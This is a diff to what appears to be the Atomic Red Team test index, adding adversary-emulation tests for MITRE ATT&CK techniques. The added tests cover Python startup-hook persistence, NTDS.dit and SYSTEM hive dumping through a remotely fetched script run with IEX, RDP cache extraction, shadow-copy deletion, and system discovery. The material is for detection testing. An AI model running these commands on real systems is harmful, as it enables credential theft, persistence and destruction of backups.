+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
  T1037.003:
    technique:
      type: attack-pattern
@@ -81829,7 +82392,6 @@ collection:
      auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
      description: |
        Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
-
        [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
      supported_platforms:
      - windows
@@ -81871,6 +82433,45 @@ collection:
          '
        name: powershell
        elevation_required: true
+    - name: RDP Bitmap Cache Extraction via bmc-tools
+      auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
+      description: |
+        Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
+        This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
+      supported_platforms:
+      - windows
+      input_arguments:
+        cache_path:
+          description: Path to the RDP Cache directory or specific .bmc file
+          type: path
+          default: "$env:LOCALAPPDATA\\Microsoft\\Terminal Server Client\\Cache"
+        output_dir:
+          description: Directory to save reconstructed images
+          type: path
+          default: "$env:TEMP\\rdp_screens"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and in the PATH to run bmc-tools.py
+
+          '
+        prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "Please install Python manually."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'\n$toolsDir
+          = \"$env:TEMP\\bmc-tools.py\"\n \n# create output directory\nNew-Item -ItemType
+          Directory -Path #{output_dir} -Force | Out-Null\n\n# python script download\n&
+          curl.exe -L $url --output $toolsDir\n \n# execution step\nif (Test-Path
+          $toolsDir) { python $toolsDir -s \"#{cache_path}\" -d #{output_dir} -b }\n"
+        cleanup_command: |
+          Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
+          Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
  T1557:
    technique:
      type: attack-pattern
@@ -98393,6 +98994,62 @@ credential-access:
          diskshadow.exe /s #{filename}
        name: command_prompt
        elevation_required: true
+    - name: Copy NTDS in low level NTFS acquisition via MFT parsing
+      auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+      supported_platforms:
+      - windows
+      input_arguments:
+        extract_path:
+          type: string
+          default: C:\Windows\Temp
+          description: Path for extracted NTDS.dit
+        script_url:
+          description: URL to UnderlayCopy script
+          type: url
+          default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR #{script_url} -UseBasicParsing)
+          Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+          Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+        name: powershell
+        elevation_required: true
+        cleanup_command: |
+          remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+          remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+    - name: Copy NTDS in low level NTFS acquisition via fsutil
+      auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+      supported_platforms:
+      - windows
+      input_arguments:
+        extract_path:
+          type: string
+          default: C:\Windows\Temp
+          description: Path for extracted NTDS.dit
+        script_url:
+          description: URL to UnderlayCopy script
+          type: url
+          default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR #{script_url} -UseBasicParsing)
+          Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+          Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+        name: powershell
+        elevation_required: true
+        cleanup_command: |
+          remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+          remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
  T1558.003:
    technique:
      type: attack-pattern
@@ -98829,8 +99486,7 @@ credential-access:
          '
        prereq_command: |
          $RequiredModule = Get-Module -Name DSInternals -ListAvailable
-          if (-not $RequiredModule) {exit 1}
-          if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
+          if (-not $RequiredModule) {exit 1} else {exit 0}
        get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force

          '
@@ -100070,6 +100726,61 @@ discovery:
        cleanup_command:
        name: powershell
        elevation_required: false
+    - name: Device Driver Discovery (Linux)
+      auto_generated_guid: d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1
+      description: 'Displays a list of loaded kernel modules on a Linux system, which
+        is used to enumerate drivers.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'lsmod
+
+          '
+        name: bash
+        elevation_required: false
+    - name: Enumerate Kernel Driver Files (Linux)
+      auto_generated_guid: 13c0fef5-9be9-4d7f-9c6b-901624e53770
+      description: 'Finds and lists all kernel driver files on a Linux system in order
+        to provide a broader view of available drivers, not just loaded ones.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'find /lib/modules/$(uname -r)/kernel/drivers -name "*.ko*"
+
+          '
+        name: bash
+        elevation_required: false
+    - name: List loaded kernel extensions (macOS)
+      auto_generated_guid: 71eab73d-5d7d-4681-9a72-7873489a5b85
+      description: 'Displays a list of loaded kernel extensions (kexts) on a macOS
+        system.
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'kextstat
+
+          '
+        name: bash
+        elevation_required: false
+    - name: Find Kernel Extensions (macOS)
+      auto_generated_guid: c63bbe52-6f17-4832-b221-f07ba8b1736f
+      description: 'Searches for kernel extension (kext) files on a macOS system.
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'kextfind
+
+          '
+        name: bash
+        elevation_required: false
  T1087.002:
    technique:
      type: attack-pattern
@@ -101654,7 +102365,7 @@ discovery:
      - windows
      executor:
        command: |
-          tasklist.exe
+          tasklist.exe /svc
          sc query
          sc query state= all
        name: command_prompt
@@ -101702,6 +102413,62 @@ discovery:
      executor:
        name: command_prompt
        command: powershell.exe Get-Service
+    - name: System Service Discovery - macOS launchctl
+      auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
+      description: |
+        Enumerates services on macOS using launchctl. Used by adversaries for
+        identifying daemons, background services, and persistence mechanisms.
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: launchctl list
+    - name: System Service Discovery - Windows Scheduled Tasks (schtasks)
+      auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
+      description: 'Enumerates scheduled tasks on Windows using schtasks.exe.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        command: schtasks /query /fo LIST /v
+    - name: System Service Discovery - Services Registry Enumeration
+      auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
+      description: |
+        Enumerates Windows services by reading the Services registry key
+        (HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
+        Manager APIs or CLI tools such as sc.exe or Get-Service.
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: |
+          Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
+            ForEach-Object {
+              $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
+              [PSCustomObject]@{
+                Name        = $_.PSChildName
+                DisplayName = $p.DisplayName
+                ImagePath   = $p.ImagePath
+                StartType   = $p.Start
+              }
+            }
+    - name: System Service Discovery - Linux init scripts
+      auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
+      description: |
+        Enumerates system services by listing SysV init scripts and runlevel
+        symlinks under /etc/init.d and /etc/rc*.d.
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        command: |
+          echo "[*] Listing SysV init scripts (/etc/init.d):"
+          if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
+          echo
+          echo "[*] Listing runlevel directories (/etc/rc*.d):"
+          ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
  T1040:
    technique:
      type: attack-pattern
@@ -105364,20 +106131,20 @@ discovery:
      description: |
        Get a listing of network connections.

-        Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
+        Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires
+        elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
      supported_platforms:
      - windows
      executor:
        command: |
-          netstat
+          netstat -ano
          net use
-          net sessions
+          net sessions 2>nul
        name: command_prompt
    - name: System Network Connections Discovery with PowerShell
      auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
      description: |
        Get a listing of network connections.
-
        Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
      supported_platforms:
      - windows
@@ -105386,6 +106153,42 @@ discovery:

          '
        name: powershell
+    - name: System Network Connections Discovery via PowerShell (Process Mapping)
+      auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5
+      description: 'Enumerate TCP connections and map to owning process names via
+        PowerShell.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: |
+          Get-NetTCPConnection | ForEach-Object {
+            $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
+            [pscustomobject]@{
+              Local   = "$($_.LocalAddress):$($_.LocalPort)"
+              Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
+              State   = $_.State
+              PID     = $_.OwningProcess
+              Process = if ($p) { $p.ProcessName } else { $null }
+            }
+          } | Sort-Object State,Process | Format-Table -AutoSize
+    - name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
+      auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
+      description: |
+        List active TCP/UDP network connections using ss, with lsof as a fallback
+        when ss is unavailable. Serves as an alternative to the netstat-based test.
+      supported_platforms:
+      - linux
+      - macos
+      executor:
+        name: bash
+        command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
+          -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
+          fi
+
+          '
    - name: System Network Connections Discovery FreeBSD, Linux & MacOS
      auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
      description: |
@@ -105412,6 +106215,19 @@ discovery:
          netstat
          who -a
        name: sh
+    - name: System Network Connections Discovery via sockstat (Linux, FreeBSD)
+      auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b
+      description: 'Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        command: |
+          sockstat -4
+          sockstat -6 2>/dev/null || true
+          sockstat -l 2>/dev/null || true
    - name: System Discovery using SharpView
      auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
      description: "Get a listing of network connections, domains, domain users, and
@@ -117093,6 +117909,28 @@ impact:

          '
        name: sh
+    - name: Windows - Simulate CPU Load with PowerShell
+      auto_generated_guid: 44315fb0-f78d-4cef-b10f-cf21c1fe2c75
+      description: |
+        This test simulates high CPU load using PowerShell, commonly seen in resource hijacking.
+        Spawns background jobs to stress CPU cores for a specified duration.
+      supported_platforms:
+      - windows
+      input_arguments:
+        duration_seconds:
+          description: Duration in seconds to run the CPU stress test
+          type: integer
+          default: 30
+        cpu_threads:
+          description: Number of threads to stress (default 4)
+          type: integer
+          default: 4
+      executor:
+        command: |
+          $end = (Get-Date).AddSeconds(#{duration_seconds})
+          1..#{cpu_threads} | ForEach-Object { Start-Job { param($t) while((Get-Date) -lt $t) { $i=0; while($i -lt 200000){$i++} } } -ArgumentList $end }
+          Get-Job | Wait-Job | Remove-Job
+        name: powershell
  T1565.002:
    technique:
      type: attack-pattern
@@ -117853,6 +118691,35 @@ impact:
        cleanup_command: sudo tmutil enable
        name: sh
        elevation_required: true
+    - name: Windows - Delete Volume Shadow Copies via Diskshadow
+      auto_generated_guid: 42111a6f-7e7f-482c-9b1b-3cfd090b999c
+      description: 'Deletes Windows Volume Shadow Copies via Diskshadow binary. This
+        technique is used by numerous ransomware families such as Crytox. The binary
+        is present by default in Windows Server operating systems (since Windows Server
+        2008). Upon execution, it will delete all shadow copies of the server.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Create volume shadow copy of C:\ . This prereq command only
+          works on Windows Server or Windows 8.
+
+          '
+        prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
+          that satisfy the query.")) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'vssadmin.exe create shadow /for=c:
+
+          '
+      executor:
+        command: '"delete shadows all" | diskshadow.exe
+
+          '
+        name: powershell
+        elevation_required: true
  T1561.001:
    technique:
      type: attack-pattern
@@ -1529,7 +1529,6 @@ defense-evasion:
          $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
          $bytes = [System.Convert]::FromBase64String($encodedString)
          $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
-
          #write the decoded eicar string to file
          $decodedString | Out-File T1027.013_decodedEicar.txt
        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
@@ -1547,15 +1546,58 @@ defense-evasion:
        command: |-
          $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
          $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
-
          $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
          $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
-
          #Write the decrypted eicar string to a file
          $decryptedString | out-file T1027.013_decryptedEicar.txt
        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
        name: powershell
        elevation_required: false
+    - name: Password-Protected ZIP Payload Extraction and Execution
+      auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
+      description: |
+        Extracts and executes a script from a password-protected ZIP archive.
+        This technique is commonly used by malware families like Emotet and QBot to deliver payloads
+        via email attachments where the password is provided in the message body.
+        The encrypted ZIP evades static file analysis until extracted at runtime.
+        Upon successful execution, displays confirmation and system information.
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        zip_password:
+          description: Password used to protect the ZIP archive
+          type: String
+          default: infected
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'zip and unzip must be installed
+
+          '
+        prereq_command: 'which zip && which unzip
+
+          '
+        get_prereq_command: 'echo "Install zip and unzip using your package manager
+          (apt-get, yum, or brew)"
+
+          '
+      executor:
+        command: |
+          echo '#!/bin/bash' > /tmp/art_payload.sh
+          echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
+          echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
+          echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
+          echo 'uname -a' >> /tmp/art_payload.sh
+          cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
+          rm /tmp/art_payload.sh
+          echo "Encrypted ZIP created. Extracting with password..."
+          unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
+          echo "Executing extracted payload:"
+          bash /tmp/art_payload.sh
+        cleanup_command: |
+          rm -f /tmp/art_payload.sh
+          rm -f /tmp/art_encrypted.zip
+        name: bash
  T1014:
    technique:
      type: attack-pattern
@@ -24931,7 +24973,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -24967,7 +25009,102 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1546.018
+    atomic_tests:
+    - name: Python Startup Hook - atomic_hook.pth (Linux)
+      auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
+      description: "Executes code by creating atomic_hook.pth in the site-packages
+        directory. \nThis script runs automatically for every user on the system when
+        Python starts.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          TEMPDIR="/tmp/atomic_sitecust_posix"
+          mkdir -p "$TEMPDIR"
+          "#{python_exe}" -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+          ls -la "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+          if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          rm -rf /tmp/atomic_sitecust_posix
+          echo "[+] Successful Removed atomic_hook.pth"
+          rm -rf /tmp/atomic_hook_poc.txt
+          echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
  T1037.003:
    technique:
      type: attack-pattern
@@ -33471,20 +33608,6 @@ persistence:

          3. Click 'Select'
        name: manual
-    - name: Chrome/Chromium (Chrome Web Store)
-      auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
-      description: Install the "Minimum Viable Malicious Extension" Chrome extension
-      supported_platforms:
-      - linux
-      - windows
-      - macos
-      executor:
-        steps: |
-          1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
-          in Chrome
-
-          2. Click 'Add to Chrome'
-        name: manual
    - name: Firefox
      auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
      description: 'Create a file called test.wma, with the duration of 30 seconds
@@ -38569,7 +38692,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -38605,7 +38728,102 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1546.018
+    atomic_tests:
+    - name: Python Startup Hook - atomic_hook.pth (Linux)
+      auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
+      description: "Executes code by creating atomic_hook.pth in the site-packages
+        directory. \nThis script runs automatically for every user on the system when
+        Python starts.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          TEMPDIR="/tmp/atomic_sitecust_posix"
+          mkdir -p "$TEMPDIR"
+          "#{python_exe}" -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
+          ls -la "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+          if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          rm -rf /tmp/atomic_sitecust_posix
+          echo "[+] Successful Removed atomic_hook.pth"
+          rm -rf /tmp/atomic_hook_poc.txt
+          echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
